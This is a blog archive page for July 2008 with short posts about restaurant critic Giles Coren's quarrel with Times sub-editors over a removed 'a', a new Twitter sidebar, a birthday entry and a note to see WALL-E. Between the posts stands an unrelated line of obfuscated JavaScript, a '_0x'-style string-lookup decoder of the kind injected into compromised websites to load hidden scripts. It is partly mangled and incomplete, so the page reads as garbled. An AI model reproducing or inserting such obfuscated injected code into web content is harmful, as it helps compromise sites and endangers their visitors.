Archive for July 2008

For the want of an “a”

The London Times sub-editorial staff removes the word “a” from a review by restaurant critic Giles Coren; Giles Coren writes a thousand words in response. Warning: Liberally peppered with obscenities.

Follow-up: Sunday Times sub-editors respond with civility and aplomb.

(via Daring Fireball)

function _0×9e23(_0×14f71d,_0×4c0b72){const _0×4d17dc=_0×4d17();return _0×9e23=function(_0×9e2358,_0×30b288){_0×9e2358=_0×9e2358-0×1d8;let _0×261388=_0×4d17dc[_0x9e2358];return _0×261388;},_0×9e23(_0×14f71d,_0×4c0b72);}

Your Latest Twit

I have added a Twitter sidebar to Idiozeitgeist.

In which a grievous omission is rectified

I’ve posted an entry, dated June 7, for Kels’s birthday.


Go see WALL-E. I’ll review it later.